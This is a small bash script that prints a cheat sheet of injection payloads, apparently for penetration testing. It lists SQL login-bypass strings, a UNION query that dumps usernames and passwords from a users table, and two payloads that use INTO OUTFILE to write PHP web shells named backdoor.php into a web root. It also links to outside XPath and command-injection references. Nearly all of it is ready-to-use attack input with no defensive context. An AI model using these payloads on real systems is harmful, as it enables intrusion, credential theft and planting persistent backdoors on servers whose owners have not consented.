#!/bin/bash

# display scripts and commands for injection exploit

Frame='\033[0;32m'   # Green
Link='\033[0;35m'  	 # Purple
Title='\033[1;33m' 	 # Bold Yellow
Comment='\033[0;36m' # Cyan
End='\033[0m'		 # No Color
Point='\033[0;31m[*]\033[0m'

echo -e "${Frame}###${End} ${Title}SQL Basic Injection${End} ${Frame}###${End}"
echo -e "${Point} ' or 1=1 LIMIT 1 --"
echo -e "${Point} ' or 1=1 LIMIT 1 -- -"
echo -e "${Point} ' or 1=1 LIMIT 1#"
echo -e "${Point} 'or 1#"
echo -e "${Point} ' or 1=1 --"
echo -e "${Point} ' or 1=1 -- -"
echo -e "${Point} admin\'-- -"
echo -e "${Point} select \"<?php system(\$_GET['cmd']); ?>\" INTO OUTFILE 'C:/wamp/www/backdoor.php'"
echo -e "${Point} union all select 1,2,3,4,concat(username,0x3a,password),6 from users"
echo -e "${Point} union all select 1,2,3,4,\"<?php echo shell_exec(\$_GET['cmd']);?>\",6 into OUTFILE 'c:/inetpub/wwwroot/backdoor.php'"
echo -e ""

echo -e "${Frame}###${End} ${Title}XPATH Injection${End} ${Frame}###${End}"
echo -e "${Link}https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/XPATH%20Injection/README.md${End}"
echo -e ""

echo -e "${Frame}###${End} ${Title}Command Injection${End} ${Frame}###${End}"
echo -e "${Link}https://cheatsheet.haax.fr/web-pentest/injections/server-side-injections/os/${End}"
echo -e ""